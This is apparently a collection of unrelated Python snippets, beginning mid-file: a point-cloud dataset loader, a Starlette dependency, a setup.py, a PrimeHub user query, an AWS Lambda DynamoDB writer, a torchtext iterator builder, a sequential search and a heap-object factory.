            point_set_length = len(point_set)
            if point_set_length >= self.npoints:
                point_set, choice = data_utils.choose_points(point_set, self.npoints)
                norm_part_point_set = norm_part_point_set[choice]
            else:
                extra_point_set, choice = data_utils.choose_points(point_set, self.npoints - point_set_length)
                point_set = np.append(point_set, extra_point_set, axis=0)
                norm_part_point_set = np.append(norm_part_point_set, norm_part_point_set[choice], axis=0)
            point_sets.append((point_set, norm_part_point_set, is_full))
        return point_sets

    def __len__(self):
        return len(self.datapath)

    def get_number_of_parts(self):
        return self.num_parts


if __name__ == '__main__':
    from utils import show3d_balls

    d = PartDatasetPCN(root=os.path.join(BASE_DIR, '../data/shapenetcore_partanno_segmentation_benchmark_v0'),
                       class_choice='Chair', split='test')
    i = 27
    point_sets = d[i]
    for p in range(d.get_number_of_parts()):
        ps, _, _ = point_sets[p]
        show3d_balls.showpoints(ps, ballradius=8)
440512
from starlette.requests import Request

from streams_explorer.core.services.dataflow_graph import DataFlowGraph


def get_dataflow_graph(request: Request) -> DataFlowGraph:
    return request.app.state.dataflow_graph
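# Usage sketch (assumption): wire the accessor into a route via FastAPI's
# dependency injection, with app.state.dataflow_graph set at startup.
#
#   from fastapi import Depends
#
#   @app.get("/graph")
#   def graph(dataflow_graph: DataFlowGraph = Depends(get_dataflow_graph)):
#       ...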
440517
from setuptools import setup

setup(
    name='spoofbuz',
    version='1.0',
    description='A library for spoofing the Qobuz web player',
    author='DashLt',
    packages=['spoofbuz'],
    classifiers=['Programming Language :: Python :: 3', ]
)
440530
from primehub import Helpful, cmd, Module


class Me(Helpful, Module):

    @cmd(name='me', description='Get user information', return_required=True)
    def me(self) -> dict:
        """
        Get account information

        :rtype: dict
        :returns: account information
        """
        query = """
        query {
          me {
            id
            username
            firstName
            lastName
            email
            isAdmin
          }
        }
        """
        result = self.request({}, query)
        if 'data' in result and 'me' in result['data']:
            return result['data']['me']
        return result

    def help_description(self):
        return "Show user account"
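# Usage sketch (assumption: a configured PrimeHub SDK client exposes this
# command group; the construction below follows the SDK's documented pattern
# but is not taken from this file):
#
#   from primehub import PrimeHub, PrimeHubConfig
#   ph = PrimeHub(PrimeHubConfig())
#   print(ph.me.me())
#
# or, from the CLI wrapper:  primehub me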
440577
import boto3
import json
from datetime import datetime
from decimal import Decimal

HEADERS = {'Content-Type': 'application/json'}

dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('moodtracker_events')


def handler(event, context):
    user_id = event['requestContext']['authorizer']['claims']['sub']

    try:
        events = json.loads(event['body'], parse_float=Decimal)
    except json.JSONDecodeError as e:
        print(e)
        return {
            'body': json.dumps({'error': 'Malformed request body'}),
            'headers': HEADERS,
            'statusCode': 400,
        }

    try:
        with table.batch_writer() as batch:
            # renamed loop variable so it no longer shadows the handler's `event` argument
            for user_event in events:
                user_event['serverCreatedAt'] = datetime.utcnow().isoformat()
                user_event['userId'] = user_id
                batch.put_item(Item=user_event)
        return {'statusCode': 204}
    except Exception as e:
        print(e)
        return {
            'body': json.dumps({'error': 'Internal server error'}),
            'headers': HEADERS,
            'statusCode': 500,
        }
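# Local smoke-test sketch (assumptions: AWS credentials are configured, the
# `moodtracker_events` table exists, and the event body fields below are
# placeholders; the envelope mimics API Gateway with a Cognito authorizer).
if __name__ == "__main__":
    fake_event = {
        "requestContext": {"authorizer": {"claims": {"sub": "user-123"}}},
        "body": json.dumps([{"type": "v1/moods/create", "payload": {"mood": 7}}]),
    }
    print(handler(fake_event, None))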
440604
import torch
from torchtext.data import BucketIterator


def build(dataset, device, batch_size, is_train):
    device = None if device is None else torch.device(device)
    iterator = BucketIterator(
        dataset=dataset,
        batch_size=batch_size,
        repeat=False,
        sort_key=dataset.sort_key,
        sort=False,
        sort_within_batch=False,
        # shuffle batches
        shuffle=is_train,
        device=device,
        train=is_train
    )
    return iterator
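# Usage sketch (assumption: `train_data` is a legacy torchtext Dataset that
# defines a sort_key, e.g. a TranslationDataset):
#
#   train_iter = build(train_data, device="cuda:0", batch_size=32, is_train=True)
#   for batch in train_iter:
#       ...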
440606
def seq_search(lst, element):
    pos = 0
    found = False
    while pos < len(lst) and not found:
        if lst[pos] == element:
            found = True
        else:
            pos += 1
    return found


arr = [1, 2, 3, 4, 5, 56]
print(seq_search(arr, 3))
print(seq_search(arr, 56))
print(seq_search(arr, 1))
print(seq_search(arr, 6))
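# Note: this is the classic O(n) sequential scan; Python's built-in membership
# test does the same work, e.g. `3 in arr` is equivalent to seq_search(arr, 3).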
440620
from typing import Any, Collection, List, Optional, Tuple, Union

from ..models.heap_object import HeapObject, RenderOptions
from ..models.options import Options
from ..models.unique_identifier import UniqueIdentifier
from .base_heap_object_factory import HeapObjectFactory


class SequenceHeapObjectFactory(HeapObjectFactory):
    def __init__(self, obj: Union[Tuple, List], options: Options = None) -> None:
        super().__init__(obj, options)
        self._object_id = self.get_object_id(obj)
        self._max_len = (self.options.max_size or len(obj)) if self.options is not None else len(obj)
        self._render_options: Optional[RenderOptions] = None
        if len(obj) > self._max_len:
            self._render_options = RenderOptions(True)
        # a no-op slice when no truncation is needed
        self._object = obj[:self._max_len]

    def get_id(self) -> str:
        return self._object_id

    def get_value(self) -> str:
        return self.get_type()

    def get_objects_to_reduce(self) -> Union[None, Collection[Any]]:
        return self._object

    def create(self) -> HeapObject:
        heap_obj = HeapObject(self.get_id(), self.get_type(), self.get_value(), 'sequence', self._render_options)
        heap_obj.immutable = isinstance(self._object, tuple)
        heap_obj.references = [UniqueIdentifier(HeapObjectFactory.get_object_id(v)) for v in self._object]
        return heap_obj
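# Usage sketch (assumption about the surrounding API: Options is taken to
# expose a max_size attribute, as read in __init__ above; the keyword
# constructor is hypothetical):
#
#   factory = SequenceHeapObjectFactory([1, 2, 3, 4], options=Options(max_size=2))
#   heap_obj = factory.create()  # truncated to 2 elements; render_options flags it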